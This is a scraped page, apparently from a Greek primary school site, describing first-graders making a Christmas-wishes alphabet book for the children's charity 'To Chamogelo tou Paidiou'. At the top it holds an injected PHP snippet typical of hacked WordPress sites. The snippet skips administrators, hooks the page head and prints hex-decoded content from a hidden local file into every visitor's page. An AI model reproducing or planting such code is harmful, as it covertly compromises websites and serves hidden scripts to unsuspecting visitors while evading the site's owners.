if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } ‘ Το Χαμόγελο του Παιδιού ‘ |

‘ Το Χαμόγελο του Παιδιού ‘

Στα πλαίσια της εθελοντικής προσφοράς τροφίμων για το ‘Χμόγελο του Παιδιού’ από τις οικογένειες όλων των μαθητών με πρωτοβουλία του Δ.Σ Γονέων και Κηδεμόνων, πήραμε την απόφαση με τους μαθητές της Α’ Τάξης να δημιουργήσουμε ένα αλφαβητάριο με χριστουγεννιάτικες ευχές.
  Τα παιδιά ζωγράφισαν ατομικά από μια ζωγραφιά με ευχές για τους φίλους τους στο ‘Χαμόγελο του Παιδιού’. Στο τέλος συγκεντρώσαμε όλες τις ζωγραφιές και δημιουργήθηκε ένα μικρό βιβλίο με τίτλο ” Το αλφαβητάρι των Χριστουγεννιάτικων Ευχών ”
Η δραστηριότητα αυτή κινήθηκε στο πνεύμα της προσφοράς αυτές τις χαρμόσυνες ημέρες στους ανθρώπους που πραγματικά μας έχουν ανάγκη… Από καρδιάς λοιπόν, τις καλύτερες ευχές μας…